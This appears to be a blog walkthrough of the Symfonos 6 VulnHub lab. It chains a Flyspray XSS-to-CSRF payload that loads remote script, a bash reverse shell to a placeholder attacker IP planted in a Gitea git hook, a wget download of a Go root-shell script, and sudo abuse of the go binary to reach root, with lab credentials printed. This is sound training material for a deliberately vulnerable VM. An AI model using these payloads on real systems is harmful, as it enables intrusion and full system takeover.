Flyspray 0.9.9 - Multiple Cross-Site Scripting Vulnerabilities                                                          | php/webapps/30891.txt
Flyspray 0.9.9.6 - Cross-Site Request Forgery                                                                           | php/webapps/18468.html

FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery                                                    | php/webapps/41918.txt
Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure                                                           | php/webapps/2852.txt
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$

Among these search results, the exploit listed in the sixth position , targeting Flyspray versions 1.0-rc4 , might be valuable. This exploit could potentially allow us to take advantage of known vulnerabilities within the application.

Exploiting FlySpray (Manually)

So, let's download this exploit to local storage.

┌──(kali㉿kali)-[~]

└─$ searchsploit -m php/webapps/41918.txt

Exploit: FlySpray 1.0-rc4 - Cross-Site Scripting / Cross-Site Request Forgery

URL: https://www.exploit-db.com/exploits/41918

Path: /usr/share/exploitdb/exploits/php/webapps/41918.txt

Codes: N/A

Verified: True

File Type: ASCII text

Copied to: /home/kali/41918.txt

┌──(kali㉿kali)-[~]

└─$

Now that it is saved as a text file, let's open it and examine its contents.

The file provides basic information about the exploit, outlining its purpose and potential impact. Let's analyze it further.

SSRF (Server-Side Request Forgery) vulnerabilities allow attackers to send crafted requests from a compromised server, potentially accessing internal systems or escalating the attack. In this case, an XSS (Cross-Site Scripting) vulnerability in Flyspray 1.0-rc4 can be combined with CSRF (Cross-Site Request Forgery) to exploit the system further. This approach could create a new admin account by leveraging the XSS-to-CSRF method.

Upon reviewing the file, I can determine how it can be utilized.

Register a New user and verify if is it Vulnerable to XSS

To test for an XSS vulnerability, our first step is to register a new user .

1. On the login page , click on the Register button.

2. This action displays a registration form that we need to fill out.

In the Username field, enter a username of your choice.
In the Password field, input a password. For this demonstration, I'll use 12345678.
In the Real Name field , I will insert a basic XSS script that triggers an alert displaying "hello" upon successful execution.
Once the form is completed, submit it to register the new user.

3. After successful registration, we can proceed by logging in with the newly created credentials to verify if the XSS vulnerability exists.

4. Now, let’s navigate to the user profile page.

5. Upon navigating, the user profile page triggers a popup displaying "hello!", which confirms the application is vulnerable to XSS.

Now that, we know Flyspray to be vulnerable, let’s serve the exploit script and feed it to the admin account by changing the Real name into a script code that will allow us to execute scripts to gather the CSRF token and submit a form to create a new admin .

Serve the exploit script and feed it to the admin account

1. First, we have to create a file that containing the exploit code.

You can find the exploit script in the download text file. Copy it and paste it into a text editor. Save the script with the filename, exploit.js .

2. Now, we need to set up a simple HTTP server to host the exploit script. Use Python to serve the script: python3 -m http.server

┌──(kali㉿kali)-[~]
└─$ python3 -m http.server

Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

3. Now, we need to deploy the Exploit.

Modify the Real Name field of the logged-in user. Input the following payload in the Real Name field:

"><script src="http://<YOUR_SERVER_IP>:8000/exploit.js"></script>

Replace <YOUR_SERVER_IP> with the IP address hosting the HTTP server.

Navigate to a page where the Real Name field is reflected, such as in bug report comments or the user profile page.

4. Upon clicking the profile icon, the embedded exploit.js script in the field will execute automatically.

5. To verify whether the exploit was successful, check the HTTP server logs on the see lf-hosted Python server.

The logs should confirm that the script was accessed, which indicates it was triggered correctly.

6. Make sure to work properly, It is important to add a comment before updating the details to ensure the exploit executes properly. Adding a simple comment like ' Help! ' can help track changes and confirm if the payload triggers successfully.

Re-Login with newly created Credentials

Once confirmed, proceed to logout and re-login using the newly created credentials:

Username: hacker
Password: 12345678

With a successful login, we now check if the newly created account has any additional information that will lead us to further exploitation. This can be confirmed by accessing the dashboard panel .

Within the dashboard panel, there is a bug report with ID: 2 . Reviewing the task description for this report, reveals a hint, which contains credentials. These credentials might grant access to other systems or services within the network.

Upon reviewing the task description associated with this report, we discovered a hint containing credentials.

With this credential we have we can try to attempt to gain a foothold on the target system.

Foothold

Access Via SSH

To gain Foothold using the provided credentials, we will try to attempt to access the system via SSH.

┌──(kali㉿kali)-[~]
└─$ ssh [email protected]         
The authenticity of host '192.168.103.18 (192.168.103.18)' can't be established.
ED25519 key fingerprint is SHA256:MCN41cqZbJGd911b9OVaVYAdycWmYvB/Vbm91gBlfpY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.103.18' (ED25519) to the list of known hosts.
[email protected]: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

However, it was discovered that password logins have been disabled , which is a sensible security measure.

Re-examining the hint reveals a reference to Gitea , indicating that it may be configured internally for Git-related needs.

Gitea - Lightweight Git Hosting

Gitea is a lightweight, self-hosted Git service providing an easy-to-use interface for managing repositories. It is an efficient alternative to GitHub and GitLab, ideal for teams and individuals.

But, what is Gitea?

Gitea is a lightweight, self-hosted Git service similar to GitHub, offering features such as:

Repositories for version control

Issue tracking for task management

Code review for collaborative development

In this scenario, Gitea might be accessible internally and could contain sensitive information or misconfigurations that can be exploited.

The focus now shifts to Enumerating Gitea for potential vulnerabilities or misconfigurations.

Enumerate Gitea

From the Nmap scan, we previously identified a service running on Port 3000 , running a service resembling Gitea , a self-hosted Git service, which we are looking for enumeration.

3000/tcp open  ppp?
| fingerprint-strings: 
|   GenericLines, Help: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=49fd5825fad5aa8d; Path=/; HttpOnly
|     Set-Cookie: _csrf=Pk916asD1Xz4WaGVF4mpyjccdr06MTczMzA3NzAzNDk2ODc3OTI3NA; Path=/; Expires=Mon, 02 Dec 2024 18:17:14 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:15 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title> Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|     console.info('ServiceWorker registration successful with scope: ', registrat
|   HTTPOptions: 
|     HTTP/1.0 404 Not Found
|     Content-Type: text/html; charset=UTF-8
|     Set-Cookie: lang=en-US; Path=/; Max-Age=2147483647
|     Set-Cookie: i_like_gitea=82b3bbaff5fa3556; Path=/; HttpOnly
|     Set-Cookie: _csrf=aoXQJDIzGFtpa492o1ciqnAr6Lo6MTczMzA3NzA0MDE3MTgxMzQ2OA; Path=/; Expires=Mon, 02 Dec 2024 18:17:20 GMT; HttpOnly
|     X-Frame-Options: SAMEORIGIN
|     Date: Sun, 01 Dec 2024 18:17:20 GMT
|     <!DOCTYPE html>
|     <html lang="en-US">
|     <head data-suburl="">
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Page Not Found - Symfonos6</title>
|     <link rel="manifest" href="/manifest.json" crossorigin="use-credentials">
|     <script>
|     ('serviceWorker' in navigator) {
|     navigator.serviceWorker.register('/serviceworker.js').then(function(registration) {
|_    console.info('ServiceWorker registration successful

Let's access it from the web browser.

Previously, we found a credential that can be used to log in to Gitea .

Username: Achilles
Password: h2sBr9gryBunKdF9.

Click on sign in to navigate to the Sign In page of Gitea and enter the previously founded credentials:

Upon trying, we successfully logged in to Achille's dashboard panel .

Now, let’s inspect Achilles' dashboard panel.

Inspect Gitea Dashboard

Upon logging in as the user Achilles, two repositories are noted:

Symfonos-blog
Symfonos-API

Inspect the Repo: symfonos-blog.

Based on the web content and structure, this repository appears to extend the web page's functionality at http://192.168.103.18 .

Inspect the Repo: symfonos-api

The .env file within this repository contains data suggesting it is a custom REST API application running on Port 5000 .

While the repositories provide insights into the target system, they do not offer a direct path to escalate privileges or gain further access.

Exploiting Gitea service (Manually)

To proceed, we investigate potential exploits targeting the Gitea service.

┌──(kali㉿kali)-[~]
└─$ searchsploit gitea  
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                          |  Path
------------------------------------------------------------------------------------------------------------------------ ---------------------------------

Gitea 1.12.5 - Remote Code Execution (Authenticated)                                                                    | multiple/webapps/49571.py
Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)                                                                 | multiple/webapps/51009.rb
Gitea 1.4.0 - Remote Code Execution                                                                                     | multiple/webapps/44996.py
Gitea 1.7.5 - Remote Code Execution                                                                                     | multiple/webapps/49383.py
------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
                                                                                                                                                          
┌──(kali㉿kali)-[~]
└─$ 

We identify a suitable exploit:

Gitea 1.12.5 - Remote Code Execution (Authenticated).

Exploit-DB - Exploit 49571

Discover details about Exploit 49571 on Exploit-DB, a comprehensive archive of exploits and vulnerabilities for penetration testers and security researchers.

This Python-based exploit allows an authenticated user to execute arbitrary code on the target system.

By analyzing the exploit script, we can understand how it works and decide to replicate its steps manually to gain a reverse shell.

There are two ways to achieve this —

Modifying an existing repository or
By creating a new one.

Here, let's modify the SymfonOS-blog repository to establish the reverse shell.

But before, we must have to set up a reverse shell listener using Netcat.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444

listening on [any] 4444 ...

First, click on the repository to open it.

From the SymfonOS-Blog Git Management, locate for Setting.

Then, navigate to Settings , and under the settings menu, select Git Hooks .

In the GitHook we can edit hook files to set up custom operation. Here, we need to edit the pre-receive hook by clicking on the edit icon.

Now, let's inject the reverse shell payload script into the hook.

bash -c 'bash -i>& /dev/tcp/<Attacking_IP>/<Listening_PORT> 0>&1'

<Attacking_IP> : Specify the Listening IP address
<Listening_PORT> : Specify the Listening Port

Once the payload is added, click on Update Hook to save the changes.

However, to trigger the exploit, we need to push a commit to activate the pre-receive hook.

In the S ymfonos-blog repository, let's modify an existing file to push a commit. I'll choose the index.php file and add a simple comment tag at the end of the PHP code to avoid affecting functionality.

Click on index.php which will redirect us to the page source code, where we have to click on the edit icon to make some changes.

Next, we have to add some PHP code . To not affect the whole PHP code, I use a comment tag to add a comment.

Next, let's add a commit message to reflect the changes we've made.

Once the message is added, click on Commit Changes. This action triggers the payload and initiates a connection to our reverse shell listener.

Before committing the changes, ensure that the NetCat listener is running to capture the callback. Once the payload executes successfully, check the listener to confirm an established connection.

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444
listening on [any] 4444 ...

connect to [192.168.103.3] from (UNKNOWN) [192.168.103.18] 37794
bash: no job control in this shell

[git@symfonos6 symfonos-blog.git]$

Here, we can see in the listener that we have successfully received a connection and gained a foothold on the target system.

Enumerate the Session

Now, let's enumerate the session to explore possibilities that may help us gain full control over the target system.

First, we need to check for the user context to understand our current privileges. To do this, run the whoami command in the callback session. This will confirm the active user we are operating as within the compromised system.

[git@symfonos6 symfonos-blog.git]$ whoami
whoami

git
[git@symfonos6 symfonos-blog.git]$

Currently, we have initial access as the git user, which provides limited permissions. This means we need to perform privilege escalation or lateral movement to achieve full control over the target system.

Now, let's search for user flags. Navigate to the git user’s home directory to check for any user flag.

[git@symfonos6 symfonos-blog.git]$ cd
cd
[git@symfonos6 ~]$ ls -al
ls -al
total 20
drwx------  4 git  git  139 Dec  1 14:46 .
drwxr-xr-x. 4 root root  33 Apr  2  2020 ..
-rw-------  1 git  git   33 Dec  1 14:46 .bash_history
-rw-r--r--  1 git  git   18 Apr 10  2018 .bash_logout
-rw-r--r--  1 git  git  193 Apr 10  2018 .bash_profile
-rw-r--r--  1 git  git  231 Apr 10  2018 .bashrc
-rw-r--r--  1 git  git   73 Dec  1 14:09 .gitconfig
drwx------  2 git  git   29 Apr  2  2020 .ssh
drwxr-xr-x  3 git  git   22 Apr  2  2020 gitea-repositories
[git@symfonos6 ~]$

However, no flag is found for this user, indicating that there might be other users on the system, or we may need to enumerate further to gain higher privileges.

Privilege Escalation

Enumerate System Information

In the privilege escalation phase, our main goal is to conduct deeper enumeration to uncover potential misconfigurations, exploitable vulnerabilities, or overlooked permissions that could allow us to escalate to root or another privileged user. This involves investigating file permissions, SUID files, running services, and scheduled tasks for possible exploitation opportunities.

Since we currently operate with limited user privileges via the reverse shell, we face restrictions in accessing certain files and commands, making a thorough assessment challenging.

To move forward, let's run the sudo -l command to check if the git user has any special sudo privileges.

[git@symfonos6 ~]$ sudo -l

sudo -l

We trust you have received the usual lecture from the local System

Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.

#2) Think before you type.

#3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified

[git@symfonos6 ~]$

It appears that the git user does not have permission to run sudo commands. This suggests that other users might have higher privileges.

Escalate to user, Achilles

Let's change the directory to the /home directory.

[git@symfonos6 ~]$ cd /home
cd /home                                                                                                                                                  
[git@symfonos6 home]$ ls -al                                                                                                                              
ls -al                                                                                                                                                    
total 0                                                                                                                                                   
drwxr-xr-x.  4 root     root      33 Apr  2  2020 .                                                                                                       
dr-xr-xr-x. 17 root     root     224 Mar 30  2020 ..                                                                                                      

drwx------   6 achilles achilles 171 Apr  2  2020 achilles                                                                                                
drwx------   4 git      git      139 Dec  1 14:46 git                                                                                                     
[git@symfonos6 home]$

Here, we have identified another user directory named Achilles, which means there is a user account with this name.

If we recall from the Flyspray post-exploitation phase, we previously discovered a set of credentials.

We attempted to use them via the SSH client, but the login failed, possibly due to key-based authentication requirements or SSH configuration restrictions.

Instead of SSH, let's try switching to the Achilles user by using the su command with the discovered credentials.

[git@symfonos6 home]$ su achilles                                                                                                                         
su achilles                                                                                                                                               
Password: h2sBr9gryBunKdF9

Now, we have successfully switched to the Achilles user.

whoami                                                                                                                                                    

achilles 

However, we notice that the shell is limited or hidden. To overcome this, let's check if Python is available on the system to help us upgrade the shell. If Python’s presence is there, we can run a command to upgrade our shell for better functionality.

python --version                                                                                                                                          

Python 2.7.5                                                                                                                                              

python -c "import pty;pty.spawn('/bin/bash')"                                                                                                             

[achilles@symfonos6 home]$

Now that we have an upgraded shell, let's navigate through the directories to search for a user flag.

[achilles@symfonos6 home]$ cd                                                                                                                             
cd                                                                                                                                                        
[achilles@symfonos6 ~]$ ls -al                                                                                                                            
ls -al                                                                                                                                                    
total 16                                                                                                                                                  
drwx------  6 achilles achilles 171 Apr  2  2020 .                                                                                                        
drwxr-xr-x. 4 root     root      33 Apr  2  2020 ..                                                                                                       
lrwxrwxrwx  1 root     root       9 Apr  2  2020 .bash_history -> /dev/null                                                                               
-rw-r--r--  1 achilles achilles  18 Apr 10  2018 .bash_logout                                                                                             
-rw-r--r--  1 achilles achilles 229 Apr  2  2020 .bash_profile                                                                                            
-rw-r--r--  1 achilles achilles 231 Apr 10  2018 .bashrc                                                                                                  
drwxrwxr-x  3 achilles achilles  22 Apr  2  2020 .cache                                                                                                   
-rw-rw-r--  1 achilles achilles  57 Apr  2  2020 .gitconfig                                                                                               
lrwxrwxrwx  1 root     root       9 Apr  2  2020 .mysql_history -> /dev/null                                                                              
drwxrw----  3 achilles achilles  19 Apr  2  2020 .pki                                                                                                     
drwx------  2 achilles achilles  61 Apr  3  2020 .ssh                                                                                                     
drwxrwxr-x  5 achilles achilles  39 Apr  2  2020 go                                                                                                       
[achilles@symfonos6 ~]$ 

Unfortunately, no flag is found here either. The final step is to gain superuser privileges, which will allow us to access the root shell.

To proceed, let's check if the Achilles user has any special sudo privileges by running the sudo -l command.

[achilles@symfonos6 ~]$ sudo -l                                                                                                                           
sudo -l                                                                                                                                                   
Matching Defaults entries for achilles on symfonos6:                                                                                                      
    !visiblepw, always_set_home, match_group_by_gid, env_reset,                                                                                           
    env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",                                                                                         
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",                                                                                     
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",                                                                                  
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",                                                                                     
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",                                                                                  
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin                                                                                                          
                                                                                                                                                          
User achilles may run the following commands on symfonos6:                                                                                                
    (ALL) NOPASSWD: /usr/local/go/bin/go
[achilles@symfonos6 ~]$ 

The output reveals that the Achilles user is allowed to execute the /usr/local/go/bin/go command as root without requiring a password.

The go command, part of the Go programming language environment, can be leveraged to execute arbitrary commands or scripts.

This provides a direct pathway to escalate privileges and gain root access by crafting and executing a malicious Go script.

Privilege Escalation via Misconfigured Sudo Permissions on Go Binary

First, let's change the directory to the /tmp directory.

[achilles@symfonos6 ~]$ cd /tmp
cd /tmp                                                                                                                                                   
[achilles@symfonos6 tmp]$

Here, we need to create a Go script that will help us gain a root shell when executed. Open a text editor and create a new file. Add the following code and save it as root_shell.go .

package main

import (

    "os"

    "os/exec"

)

func main() {
    cmd := exec.command("/bin/bash")

    cmd.Stdin = os.Stdin

    cmd.Stdout = os.Stdout

    cmd.Stderr = os.Stderr

    cmd.Run()

}

Now, we need to transfer this script to the target machine. If you recall, we had already started the HTTP server earlier to host the JavaScript file used in exploiting Flyspray .

Switch back to the target machine where we previously navigated to the /tmp directory. Use the wget command to download the script from our attacking machine.

[achilles@symfonos6 tmp]$ wget http://192.168.103.3:8000/root_shell.go                                                                                    
wget http://192.168.103.3:8000/root_shell.go                                                                                                              
--2024-12-01 15:03:32--  http://192.168.103.3:8000/root_shell.go                                                                                          
Connecting to 192.168.103.3:8000... connected.                                                                                                            
HTTP request sent, awaiting response... 200 OK                                                                                                            
Length: 195 [application/octet-stream]                                                                                                                    
Saving to: 'root_shell.go'                                                                                                                                
                                                                                                                                                          
100%[======================================>] 195         --.-K/s   in 0s                                                                                 
                                                                                                                                                          
2024-12-01 15:03:32 (31.5 MB/s) - 'root_shell.go' saved [195/195]                                                                                         
                                                                                                                                                          
[achilles@symfonos6 tmp]$

Once the script is downloaded, execute it with elevated privileges using the sudo /usr/local/go/bin/go run <go_script> .

[achilles@symfonos6 tmp]$ ls -al                                                                                                                          
ls -al                                                                                                                                                    
total 28                                                                                                                                                  
drwxrwxrwt. 26 root     root      8192 Dec  1 15:03 .                                                                                                     
dr-xr-xr-x. 17 root     root       224 Mar 30  2020 ..                                                                                                    

-rw-rw-r--   1 achilles achilles   195 Dec  1 15:02 root_shell.go
[achilles@symfonos6 tmp]$ sudo /usr/local/go/bin/go run root_shell.go
sudo /usr/local/go/bin/go run root_shell.go                                                                                                               

[root@symfonos6 tmp]# 

When the script runs successfully, it should spawn a root shell. To verify the access level, run the whoami command.

[root@symfonos6 tmp]# whoami                                                                                                                              
whoami                                                                                                                                                    

root                                                                                                                                                      
[root@symfonos6 tmp]# 

Finally, navigate to the /root directory to locate and retrieve the root flag.

[root@symfonos6 tmp]# cd /root                                                                                                                            
cd /root                                                                                                                                                  
[root@symfonos6 ~]# ls -al                                                                                                                                
ls -al                                                                                                                                                    
total 32                                                                                                                                                  
dr-xr-x---.  6 root root  238 Apr  6  2020 .                                                                                                              
dr-xr-xr-x. 17 root root  224 Mar 30  2020 ..                                                                                                             
lrwxrwxrwx   1 root root    9 Mar 30  2020 .bash_history -> /dev/null                                                                                     
-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout                                                                                                   
-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile                                                                                                  
-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc                                                                                                        
drwx------   3 root root   17 Mar 30  2020 .cache                                                                                                         
-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc                                                                                                         
-rw-r--r--   1 root root   57 Apr  2  2020 .gitconfig                                                                                                     
lrwxrwxrwx   1 root root    9 Apr  2  2020 .mysql_history -> /dev/null                                                                                    
drwxr-----   3 root root   19 Mar 30  2020 .pki                                                                                                           
drwxr-xr-x   2 root root   29 Apr  3  2020 .ssh                                                                                                           
-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc                                                                                                        
-rw-------   1 root root 1555 Apr  6  2020 .viminfo                                                                                                       

-rw-r--r--   1 root root  592 Apr  2  2020 proof.txt                                                                                                      
drwxr-x---   2 root root   24 Apr  4  2020 scripts                                                                                                        
[root@symfonos6 ~]# cat proof.txt
cat proof.txt                                                                                                                                             
                                                                                                                                                          
           Congrats on rooting symfonos:6!                                                                                                                
                  ,_---~~~~~----._                                                                                                                        
           _,,_,*^____      _____``*g*\"*,                                                                                                                
          / __/ /'     ^.  /      \ ^@q   f                                                                                                               
         [  @f | @))    |  | @))   l  0 _/                                                                                                                
          \`/   \~____ / __ \_____/    \                                                                                                                  
           |           _l__l_           I                                                                                                                 
           }          [______]           I                                                                                                                
           ]            | | |            |                                                                                                                
           ]             ~ ~             |                                                                                                                
           |                            |                                                                                                                 
            |                           |                                                                                                                 
     Contact me via Twitter @zayotic to give feedback!                                                                                                    
                                                                                                                                                          
[root@symfonos6 ~]# 

Symfonos 6 || VulnHub Walkthrough

Inside this Article:

Vulhub - Vulnerable by Design

Settings Up

Creating a New VM

Network Configuration

Start the VMs

Enumeration

Identify the IP address

Mapping the Network

Web Enumeration

Web Directory Enumeration

Inspecting the FlySpray web Dashboard

Flyspray - Bug Tracking System

About the other 2 tabs:

Exploitation

Looking for Potential Vulnerabilities

Exploiting FlySpray (Manually)

Register a New user and verify if is it Vulnerable to XSS

Serve the exploit script and feed it to the admin account

Re-Login with newly created Credentials

Foothold

Access Via SSH

Gitea - Lightweight Git Hosting

But, what is Gitea?

Enumerate Gitea

Inspect Gitea Dashboard

Inspect the Repo: symfonos-blog.

Inspect the Repo: symfonos-api

Exploiting Gitea service (Manually)

Exploit-DB - Exploit 49571

Enumerate the Session

Privilege Escalation

Enumerate System Information

Escalate to user, Achilles

Privilege Escalation via Misconfigured Sudo Permissions on Go Binary

You may like these posts

Post a Comment

#buttons=(Ok, Go it!) #days=(20)

Contact form